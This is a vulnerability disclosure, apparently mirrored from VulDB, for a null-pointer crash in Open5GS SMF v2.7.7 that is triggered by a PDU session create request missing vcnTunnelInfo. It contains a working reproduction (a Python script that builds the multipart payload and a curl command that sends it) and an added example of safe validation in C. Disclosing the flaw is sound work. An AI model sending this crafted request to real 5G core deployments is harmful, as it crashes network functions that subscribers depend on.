Submit #808482: Open5gs SMF v2.7.7 Denial of Service

Title: Open5gs SMF v2.7.7 Denial of Service

Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

SMF crashes when a `PduSessionCreateData` request for `POST /nsmf-pdusession/v1/pdu-sessions` omits `vcnTunnelInfo`.

In `smf_nsmf_handle_create_data_in_hsmf()`, the code intends to reject a missing or incomplete `vcnTunnelInfo`, but its error log dereferences `vcnTunnelInfo` even inside the `!vcnTunnelInfo` branch:

```c
vcnTunnelInfo = PduSessionCreateData->vcn_tunnel_info;
if (!vcnTunnelInfo ||
    !(vcnTunnelInfo->ipv4_addr || vcnTunnelInfo->ipv6_addr) ||
    !vcnTunnelInfo->gtp_teid) {
    ogs_error("[%s:%d] No vcnTunnelInfo [%s:%s:%s]",
        smf_ue->supi, sess->psi,
        vcnTunnelInfo->ipv4_addr ? vcnTunnelInfo->ipv4_addr : "NULL",
        vcnTunnelInfo->ipv6_addr ? vcnTunnelInfo->ipv6_addr : "NULL",
        vcnTunnelInfo->gtp_teid ? vcnTunnelInfo->gtp_teid : "NULL");
```

So the intended validation path turns into an immediate null-pointer crash.

This issue is not a duplicate of the existing callback reports in `report/smf/`; it affects a different SBI route and a different SMF business procedure.

As a control, the same request with a valid `vcnTunnelInfo` did not crash the SMF and instead returned a normal `400` error for the next missing mandatory field (`No Max Integrity Protected Data`), confirming that the crash is tied to the absent `vcnTunnelInfo`.

### Steps to reproduce

1. Ensure the Open5GS Docker lab is running and note the SMF IP:

```bash
docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' smf
```

2. Build a minimal multipart request with valid earlier fields but no `vcnTunnelInfo`:

```bash
python3 - <<'PY'
from pathlib import Path
import json

boundary = 'BOUNDARY123'
body = {
    'supi': 'imsi-001011234567899',
    'pduSessionId': 1,
    'dnn': 'internet',
    'sNssai': {'sst': 1},
    'vsmfId': 'fake-vsmf',
    'servingNetwork': {'mcc': '001', 'mnc': '01'},
    'anType': '3GPP_ACCESS',
    'ratType': 'NR',
    'ueLocation': {'nrLocation': {
        'tai': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'tac': '000001'},
        'ncgi': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'nrCellId': '000000001'},
        'ueLocationTimestamp': '2026-04-10T20:56:16Z'
    }},
    'amfNfId': 'fake-amf',
    'guami': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'amfId': '000040'},
    'n1SmInfoFromUe': {'contentId': '5gnas-sm'}
}

# Minimal UE-to-SM payload in the gsmue format accepted by this handler:
n1 = bytes.fromhex('c191a1')

parts = []
parts.append(
    (f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode())
    + json.dumps(body, separators=(',', ':')).encode()
    + b'\r\n'
)
parts.append(
    (f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n'
     f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode())
    + n1
    + b'\r\n'
)
parts.append(f'--{boundary}--\r\n'.encode())
Path('/tmp/pdu_create_missing_vcn.multipart').write_bytes(b''.join(parts))
PY
```

3. Send the request:

```bash
curl --http2-prior-knowledge -m 5 -sS -i \
  -X POST http://10.33.33.10/nsmf-pdusession/v1/pdu-sessions \
  -H 'Content-Type: multipart/related; boundary=BOUNDARY123' \
  --data-binary @/tmp/pdu_create_missing_vcn.multipart
```

4. Check SMF state and logs:

```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T20:56:16Z smf
```

### Logs

```shell
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T20:56:29.796110928Z
The process exited before emitting an application-level validation error for this request.
```

### Expected behaviour

SMF should reject the malformed create request with a normal `400` error response.

### Observed Behaviour

The HTTP/2 stream is reset and the SMF process exits with code `139`.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
Source: https://github.com/open5gs/open5gs/issues/4446
User: FrankLin (UID 97501)
Submission: 20.04.2026 21:19 (1 month ago)
Moderation: 10.05.2026 16:40 (20 days later)
Status: Accepted
VulDB entry: 362549 [Open5GS up to 2.7.7 SMF smf_nsmf_handle_create_data_in_hsmf Denial of Service]
Points: 20
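
The validation pattern described in the report, rewritten so that no log path can dereference a missing object. This is an added example, not Open5GS code and not the upstream fix; `tunnel_info_t`, `str_or_null` and `check_vcn_tunnel_info` are hypothetical names, and the sample values are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the decoded vcnTunnelInfo object; only the
 * three fields named in the report are modelled. */
typedef struct {
    const char *ipv4_addr;
    const char *ipv6_addr;
    const char *gtp_teid;
} tunnel_info_t;

static const char *str_or_null(const char *s) { return s ? s : "NULL"; }

/* Returns 0 when the tunnel info is usable, -1 otherwise. On failure `msg`
 * receives the diagnostic text; no path reads a field through a NULL `t`. */
int check_vcn_tunnel_info(const tunnel_info_t *t, char *msg, size_t len)
{
    /* Case 1: the object itself is absent. Log without touching fields. */
    if (!t) {
        snprintf(msg, len, "No vcnTunnelInfo");
        return -1;
    }
    /* Case 2: object present but incomplete. Field access is safe here. */
    if (!(t->ipv4_addr || t->ipv6_addr) || !t->gtp_teid) {
        snprintf(msg, len, "Incomplete vcnTunnelInfo [%s:%s:%s]",
                 str_or_null(t->ipv4_addr), str_or_null(t->ipv6_addr),
                 str_or_null(t->gtp_teid));
        return -1;
    }
    if (len) msg[0] = '\0';
    return 0;
}

int main(void)
{
    char msg[128];
    /* Constructed sample inputs. */
    tunnel_info_t no_teid = { "192.0.2.1", NULL, NULL };
    tunnel_info_t ok = { "192.0.2.1", NULL, "00000001" };

    printf("%d %s\n", check_vcn_tunnel_info(NULL, msg, sizeof msg), msg);
    printf("%d %s\n", check_vcn_tunnel_info(&no_teid, msg, sizeof msg), msg);
    printf("%d %s\n", check_vcn_tunnel_info(&ok, msg, sizeof msg), msg);
    return 0;
}
```

In a request handler, both failure cases would map to the `400` response the report lists as expected behaviour.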
